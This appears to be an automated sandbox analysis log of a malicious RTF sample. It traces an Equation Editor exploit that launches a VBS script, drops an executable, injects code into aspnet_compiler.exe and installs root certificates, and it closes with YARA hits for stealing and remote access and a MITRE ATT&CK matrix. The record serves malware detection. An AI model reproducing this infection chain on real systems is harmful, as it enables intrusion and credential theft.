Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rpcrtremote.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32
Source: eMJ2QgQF4u.LNK.0.dr | LNK file: ..\..\..\..\..\Desktop\eMJ2QgQF4u.rtf
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\DEMONCODER.pdb source: temp_executable.exe, 00000006.00000002.378697765.00000000026BA000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000002.378311864.00000000002B0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: C:\Users\owner\Documents\CryptoObfuscator_Output\WHJHHGDJHJKSKAJD.pdbBSJB source: wscript.exe, 00000005.00000003.378978935.000000000312F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.363758912.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.363766209.0000000003124000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.379207138.0000000003440000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.379086218.0000000002F11000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000000.364483377.0000000000A82000.00000020.00000001.01000000.00000007.sdmp, temp_executable.exe.5.dr
          Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\DEMONCODER.pdbBSJB source: temp_executable.exe, 00000006.00000002.378697765.00000000026BA000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000002.378311864.00000000002B0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\Users\owner\Documents\CryptoObfuscator_Output\WHJHHGDJHJKSKAJD.pdb source: wscript.exe, 00000005.00000003.378978935.000000000312F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.363758912.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.363766209.0000000003124000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.379207138.0000000003440000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.379086218.0000000002F11000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000000.364483377.0000000000A82000.00000020.00000001.01000000.00000007.sdmp, temp_executable.exe.5.dr
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00588C1A push eax; ret 2_2_00588C1B
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00588C12 push eax; ret 2_2_00588C13
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00578F60 push eax; retf 2_2_00578F61
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00588DEE push eax; ret 2_2_00588DEF
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00588DE6 push eax; ret 2_2_00588DE7
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00580FBA push eax; retn 0057h 2_2_00581001
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_00407041 push cs; iretd 7_2_00407042
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0041705E push edi; iretd 7_2_00417060
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_004030F0 push eax; ret 7_2_004030F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0041C8FC push cs; iretd 7_2_0041C8C9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_00401949 push 63DCA26Ah; ret 7_2_0040194E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0040214B push edx; retf 7_2_0040214E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_00402101 push ebp; iretd 7_2_0040210D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0040210E push eax; retf 7_2_0040214A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_004021A4 push eax; retf 7_2_0040214A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0041125B pushfd ; ret 7_2_0041125E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_004242D9 push esp; ret 7_2_00424330
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_004242E3 push esp; ret 7_2_00424330
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_00401AB8 push edx; retf 7_2_00401AE3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_00413416 push ecx; iretd 7_2_00413417
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0041ECDC push ds; iretd 7_2_0041ECDD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_00401DF5 push ebp; iretd 7_2_00401DB2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_00401DA6 push ebp; iretd 7_2_00401DB2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_00416EAA push esp; retf 7_2_00416EAB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_00401F0D push eax; retf 7_2_00401F19
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_00401FEB push edx; retf 7_2_00401FEC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_00410FEE push ebp; iretd 7_2_00411000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_00410FF3 push ebp; iretd 7_2_00411000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_00401FA4 push edx; ret 7_2_00401FAD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_00401FBA push 0000006Ah; iretd 7_2_00401FC6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0091DFA1 push ecx; ret 7_2_0091DFB4

          Persistence and Installation Behavior

          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
          Source: C:\Windows\SysWOW64\wscript.exe File created: C:\Users\user\AppData\Local\Temp\temp_executable.exe
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory allocated: 180000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory allocated: 2560000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory allocated: 410000 memory reserve | memory write watch
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_00960101 rdtsc 7_2_00960101
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Thread delayed: delay time: 600000
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Thread delayed: delay time: 600000
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Window / User API: threadDelayed 3930
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Window / User API: threadDelayed 357
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3360 Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\SysWOW64\wscript.exe TID: 3576 Thread sleep time: -60000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 3652 Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 3652 Thread sleep time: -4200000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 3656 Thread sleep count: 3930 > 30
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 3656 Thread sleep count: 357 > 30
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 3652 Thread sleep time: -600000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 3604 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 3668 Thread sleep time: -30000s >= -30000s
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3776 Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Thread delayed: delay time: 600000
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Thread delayed: delay time: 600000
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_00960101 rdtsc 7_2_00960101
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_009107AC NtCreateMutant,LdrInitializeThunk, 7_2_009107AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_00900080 mov ecx, dword ptr fs:[00000030h] 7_2_00900080
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_009000EA mov eax, dword ptr fs:[00000030h] 7_2_009000EA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_009226F8 mov eax, dword ptr fs:[00000030h] 7_2_009226F8
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 7EFDE008
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs"
          Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Queries volume information: C:\Users\user\AppData\Local\Temp\temp_executable.exe VolumeInformation
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match, File source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000007.00000002.383276481.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.383140999.0000000000100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match, File source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000007.00000002.383276481.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.383140999.0000000000100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          MITRE ATT&CK Matrix (a number before a technique name is the report's signature count for that cell; cells without a number had no matching signature)

          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | 111 Scripting | Valid Accounts | 33 Exploitation for Client Execution | 111 Scripting | 311 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Query Registry | Remote Services | 11 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
          Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Modify Registry | LSASS Memory | 12 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
          Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Disable or Modify Tools | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
          Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 41 Virtualization/Sandbox Evasion | NTDS | 41 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 311 Process Injection | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 11 Deobfuscate/Decode Files or Information | Cached Domain Credentials | 1 Remote System Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Obfuscated Files or Information | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Install Root Certificate | Proc Filesystem | 13 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
          Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
          Behavior Graph ID: 1520425, Sample: eMJ2QgQF4u.rtf, Startdate: 27/09/2024, Architecture: WINDOWS, Score: 100

